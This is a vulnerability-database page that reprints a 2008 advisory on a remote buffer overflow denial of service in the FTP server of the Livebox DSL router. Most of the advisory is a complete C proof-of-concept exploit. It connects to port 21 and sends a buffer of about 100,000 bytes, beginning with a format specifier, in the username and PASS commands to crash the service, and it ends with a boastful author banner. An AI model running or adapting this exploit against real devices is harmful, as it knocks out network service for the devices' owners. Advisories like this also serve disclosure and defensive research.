Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19322
HistoryMar 02, 2008 - 12:00 a.m.

Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS (FTPD)_

2008-03-0200:00:00
vulners.com
36
JSON

Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS

Discovered by: 0in from DaRk-CodeRs Security & Programming Group!
http://dark-coders.4rh.eu

DESCRIPTION:
Livebox (tested on polish "Neostrada TP Livebox") is vulnerability to remote (but from local
network, because firewall working…) buffer overflow DoS attack to FTP service.
FULL FTP SERVER NAME:"ADI Convergence Galaxy FTP server v0.1".

POC:

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>

int port=21;
struct hostent *he;
struct sockaddr_in their_addr;

int konekt(char *addr)
{
int sock;

he=gethostbyname(addr);
if(he==NULL)
{
printf("Unknow host!\nexiting…");
return -1;
}
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket");
return -2;
}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
if (connect(sock, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) == -1)
{
perror("connect");
return -1;
}

return sock;
}

int main(int argc,char *argv[])
{
printf("\n+===============================Yeah======================================+");
printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+");
printf("\n+= Remote Buffer Overflow DoS Exploit =+");
printf("\n+= bY =+");
printf("\n+= Maks M. [0in] From Dark-CodeRs Security & Programming Group! =+");
printf("\n+= 0in(dot)email[at]gmail(dot)com =+");
printf("\n+= Please visit: http://dark-coders.4rh.eu =+");
printf("\n+= Greetings to: Die_Angel, Sun8hclf, M4r1usz, Aristo89, Djlinux =+");
printf("\n+= MaLy, Slim, elwin013, Rade0n3900, Wojto111, =+");
printf("\n+= Chomzee, AfroPL, Joker186 =+");
printf("\n+===============================Yeah======================================+");

    if&#40;argc&lt;2&#41;
    {
            printf&#40;&quot;&#92;nUse &#37;s [IP]!&#92;n&quot;,argv[0]&#41;;
            exit&#40;0&#41;;
    }
    printf&#40;&quot;&#92;nConnecting to:&#37;s...&quot;,argv[1]&#41;;

int sock=konekt(argv[1]);
if(sock<0)
{
printf("\neh…");
exit(0);
}
printf("\nConnected!!\n");
char rcv[256];
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
printf("\nSending evil buffer…");
char evil[100100]="%n\x01\x02\x03\x04";
int i;
for(i=0;i<(100100)-100;i++)
{
strcat(evil,"A");
}

strcat(evil,"\r\n");
send(sock,evil,strlen(evil),0);
strcpy(rcv,"");
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
char pass[100*1000]="PASS ";
strcat(pass,evil);
strcat(pass,"\n\r");
send(sock,pass,strlen(pass),0);
strcpy(rcv,"");
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
printf("\nOK!\nYou're Livebox FTP server should fu**ed out…");

exit(0);
}

EOF.

JSON